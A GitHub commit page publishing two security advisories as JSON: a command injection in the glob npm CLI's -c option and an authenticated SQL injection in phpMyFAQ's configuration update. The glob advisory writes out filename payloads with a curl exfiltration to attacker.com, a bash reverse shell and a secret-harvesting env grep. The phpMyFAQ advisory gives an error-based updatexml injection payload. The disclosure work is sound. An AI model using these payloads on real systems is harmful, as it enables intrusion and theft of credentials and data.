Skip to content

Commit 8b8b77c

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-5j98-mcp5-4vw2 GHSA-fxm2-cmwj-qvx4
1 parent 2a455b6 commit 8b8b77c

File tree

2 files changed

+150
-0
lines changed

2 files changed

+150
-0
lines changed

advisories/github-reviewed/2025/11/GHSA-5j98-mcp5-4vw2/GHSA-5j98-mcp5-4vw2.json

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-5j98-mcp5-4vw2",
4+
"modified": "2025-11-17T17:38:56Z",
5+
"published": "2025-11-17T17:38:56Z",
6+
"aliases": [
7+
"CVE-2025-64756"
8+
],
9+
"summary": "glob CLI: Command injection via -c/--cmd executes matches with shell:true",
10+
"details": "### Summary\n\nThe glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c <command> <patterns>` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.\n\n### Details\n\n**Root Cause:**\nThe vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`:\n\n```javascript\nstream.on('end', () => foregroundChild(cmd, matches, { shell: true }))\n```\n\n**Technical Flow:**\n1. User runs `glob -c <command> <pattern>` \n2. CLI finds files matching the pattern\n3. Matched filenames are collected into an array\n4. Command is executed with matched filenames as arguments using `shell: true`\n5. Shell interprets metacharacters in filenames as command syntax\n6. Malicious filenames execute arbitrary commands\n\n**Affected Component:**\n- **CLI Only:** The vulnerability affects only the command-line interface\n- **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected\n- **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems)\n\n**Attack Surface:**\n- Files with names containing shell metacharacters: `$()`, backticks, `;`, `&`, `|`, etc.\n- Any directory where attackers can control filenames (PR branches, archives, user uploads)\n- CI/CD pipelines using `glob -c` on untrusted content\n\n### PoC\n\n**Setup Malicious File:**\n```bash\nmkdir test_directory && cd test_directory\n\n# Create file with command injection payload in filename\ntouch '$(touch injected_poc)'\n```\n\n**Trigger Vulnerability:**\n```bash\n# Run glob CLI with -c option\nnode /path/to/glob/dist/esm/bin.mjs -c echo \"**/*\"\n```\n\n**Result:**\n- The echo command executes normally\n- **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell\n- A new file `injected_poc` is created, proving command execution\n- Any command can be injected this way with full user privileges\n\n**Advanced Payload Examples:**\n\n**Data Exfiltration:**\n```bash\n# Filename: $(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" > /dev/null 2>&1)\ntouch '$(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" > /dev/null 2>&1)'\n```\n\n**Reverse Shell:**\n```bash\n# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)\ntouch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'\n```\n\n**Environment Variable Harvesting:**\n```bash\n# Filename: $(env | grep -E \"(TOKEN|KEY|SECRET)\" > /tmp/secrets.txt)\ntouch '$(env | grep -E \"(TOKEN|KEY|SECRET)\" > /tmp/secrets.txt)'\n```\n\n### Impact\n\n**Arbitrary Command Execution:**\n- Commands execute with full privileges of the user running glob CLI\n- No privilege escalation required - runs as current user\n- Access to environment variables, file system, and network\n\n**Real-World Attack Scenarios:**\n\n**1. CI/CD Pipeline Compromise:**\n- Malicious PR adds files with crafted names to repository\n- CI pipeline uses `glob -c` to process files (linting, testing, deployment)\n- Commands execute in CI environment with build secrets and deployment credentials\n- Potential for supply chain compromise through artifact tampering\n\n**2. Developer Workstation Attack:**\n- Developer clones repository or extracts archive containing malicious filenames\n- Local build scripts use `glob -c` for file processing\n- Developer machine compromise with access to SSH keys, tokens, local services\n\n**3. Automated Processing Systems:**\n- Services using glob CLI to process uploaded files or external content\n- File uploads with malicious names trigger command execution\n- Server-side compromise with potential for lateral movement\n\n**4. Supply Chain Poisoning:**\n- Malicious packages or themes include files with crafted names\n- Build processes using glob CLI automatically process these files\n- Wide distribution of compromise through package ecosystems\n\n**Platform-Specific Risks:**\n- **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing\n- **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL\n- **Mixed Environments:** CI systems often use Linux containers regardless of developer platform\n\n### Affected Products\n\n- **Ecosystem:** npm\n- **Package name:** glob\n- **Component:** CLI only (`src/bin.mts`)\n- **Affected versions:** v10.3.7 through v11.0.3 (and likely later versions until patched)\n- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd` option)\n- **Patched versions:** 11.1.0\n\n**Scope Limitation:**\n- **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe\n- **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable\n\n### Remediation\n\n- Upgrade to `[email protected]` or higher, as soon as possible.\n- If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead.\n- As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but ensure that no untrusted contents can possibly be encountered in the file path results.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "glob"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "10.3.7"
29+
},
30+
{
31+
"fixed": "11.1.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 11.0.3"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
49+
},
50+
{
51+
"type": "PACKAGE",
52+
"url": "https://github.com/isaacs/node-glob"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-78"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2025-11-17T17:38:56Z",
62+
"nvd_published_at": null
63+
}
64+
}

advisories/github-reviewed/2025/11/GHSA-fxm2-cmwj-qvx4/GHSA-fxm2-cmwj-qvx4.json

Lines changed: 86 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,86 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-fxm2-cmwj-qvx4",
4+
"modified": "2025-11-17T17:37:37Z",
5+
"published": "2025-11-17T17:37:37Z",
6+
"aliases": [
7+
"CVE-2025-62519"
8+
],
9+
"summary": "phpMyFAQ has Authenticated SQL Injection in Configuration Update Functionality",
10+
"details": "### Summary\n\nAn authenticated SQL injection vulnerability in the main configuration update functionality of phpMyFAQ (v4.0.13 and prior) allows a privileged user with 'Configuration Edit' permissions to execute arbitrary SQL commands. Successful exploitation can lead to a full compromise of the database, including reading, modifying, or deleting all data, as well as potential remote code execution depending on the database configuration.\n\n### Details\n\nThe vulnerability exists in the `save` method within the `src/phpMyFAQ/Controller/Administration/ConfigurationTabController.php` controller. This method handles the saving of application-wide configuration settings. It retrieves all submitted form data as an associative array via `$request->get('edit')`.\n\nThe core of the issue is that while the *values* of this array are processed, the *keys* are trusted implicitly and are not sanitized or validated.\n\n**File:** `src/phpMyFAQ/Controller/Administration/ConfigurationTabController.php`\n```php\n// ...\npublic function save(Request $request): JsonResponse\n{\n $this->userHasPermission(PermissionType::CONFIGURATION_EDIT);\n\n $configurationData = $request->get('edit');\n // ...\n \n foreach ($configurationData as $key => $value) {\n // The key from the user input is used to build the $newConfigValues array.\n $newConfigValues[$key] = (string) $value;\n // ...\n }\n\n // ...\n // The array, containing user-controlled keys, is passed to the model.\n $this->configuration->update($newConfigValues);\n\n return $this->json(['success' => Translation::get('ad_config_saved')], Response::HTTP_OK);\n}\n```\n\nThe `$newConfigValues` array, which contains user-controlled keys, is then passed to the `update` method in the `src/phpMyFAQ/Configuration.php` model. Here, the key (`$name`) is directly concatenated into a raw SQL query string.\n\n**File:** `src/phpMyFAQ/Configuration.php`\n```php\npublic function update(array $newConfigs): bool\n{\n // ...\n foreach ($newConfigs as $name => $value) {\n if ($name != 'main.phpMyFAQToken' && !in_array($name, $runtimeConfigs)) {\n // VULNERABLE CODE: The array key '$name' is not escaped and is directly\n // concatenated into the SQL query string. The value is escaped, but not the name.\n $update = sprintf(\n \"UPDATE %s%s SET config_value = '%s' WHERE config_name = '%s'\",\n Database::getTablePrefix(),\n $this->tableName,\n $this->getDb()->escape(trim($value)),\n $name\n );\n\n $this->getDb()->query($update);\n // ...\n }\n }\n\n return true;\n}\n```\nAn attacker can craft a malicious form parameter name (which becomes the array key) to break out of the single quotes in the `WHERE` clause and inject arbitrary SQL commands.\n\n### PoC (Proof of Concept)\n\n**Prerequisites:**\n1. A running instance of phpMyFAQ (v4.0.13 confirmed vulnerable).\n2. An authenticated user session with permissions to edit the configuration.\n\n**Execution:**\nDue to the application's CSRF protection, the easiest way to reproduce this is by capturing a legitimate request to save the configuration and modifying it using a proxy tool like Burp Suite's Repeater.\n\n1. Log in as an administrator and navigate to **Administration** -> **Configuration**.\n2. Make a trivial change (e.g., toggle a setting) and click \"Save configuration\". Capture this `POST` request to `/admin/api/configuration`.\n3. Send the captured request to Repeater. The request will contain a valid `Cookie` header and a `pmf-csrf-token` parameter.\n4. Modify the request body to inject a malicious key. Add a new `multipart/form-data` part with a crafted `name` attribute.\n\n**Example Malicious Request Body Part (Error-Based):**\n\n```\n------WebKitFormBoundaryRandomString\nContent-Disposition: form-data; name=\"edit[dummykey' and updatexml(1, concat(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT 0, 1), 0x7e), 1) and '1]\"\n\ntrue\n------WebKitFormBoundaryRandomString\n```\n*Note: You must also include the `pmf-csrf-token` part from the original request in the body.*\n\n**Result:**\nThe server will respond with a `500 Internal Server Error`, and the body of the response will contain a database error message, confirming the SQL injection. The leaked data will be present within the error string.\n\n```\nAn error occurred: XPATH syntax error: '~faq_faqadminlog~' at line 311 at /var/www/html/src/phpMyFAQ/Database/Mysqli.php\n```\n\nThis error confirms the successful execution of the injected `updatexml` payload, which has extracted and revealed the name of the first table in the database (`faq_faqadminlog`). Time-based blind techniques can also be used to extract data without relying on error messages.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "thorsten/phpmyfaq"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.0.14"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 4.0.13"
38+
}
39+
},
40+
{
41+
"package": {
42+
"ecosystem": "Packagist",
43+
"name": "phpmyfaq/phpmyfaq"
44+
},
45+
"ranges": [
46+
{
47+
"type": "ECOSYSTEM",
48+
"events": [
49+
{
50+
"introduced": "0"
51+
},
52+
{
53+
"fixed": "4.0.14"
54+
}
55+
]
56+
}
57+
],
58+
"database_specific": {
59+
"last_known_affected_version_range": "<= 4.0.13"
60+
}
61+
}
62+
],
63+
"references": [
64+
{
65+
"type": "WEB",
66+
"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-fxm2-cmwj-qvx4"
67+
},
68+
{
69+
"type": "PACKAGE",
70+
"url": "https://github.com/thorsten/phpMyFAQ"
71+
},
72+
{
73+
"type": "WEB",
74+
"url": "https://github.com/thorsten/phpMyFAQ/compare/4.0.13...4.0.14"
75+
}
76+
],
77+
"database_specific": {
78+
"cwe_ids": [
79+
"CWE-89"
80+
],
81+
"severity": "HIGH",
82+
"github_reviewed": true,
83+
"github_reviewed_at": "2025-11-17T17:37:37Z",
84+
"nvd_published_at": null
85+
}
86+
}

0 commit comments

Comments
 (0)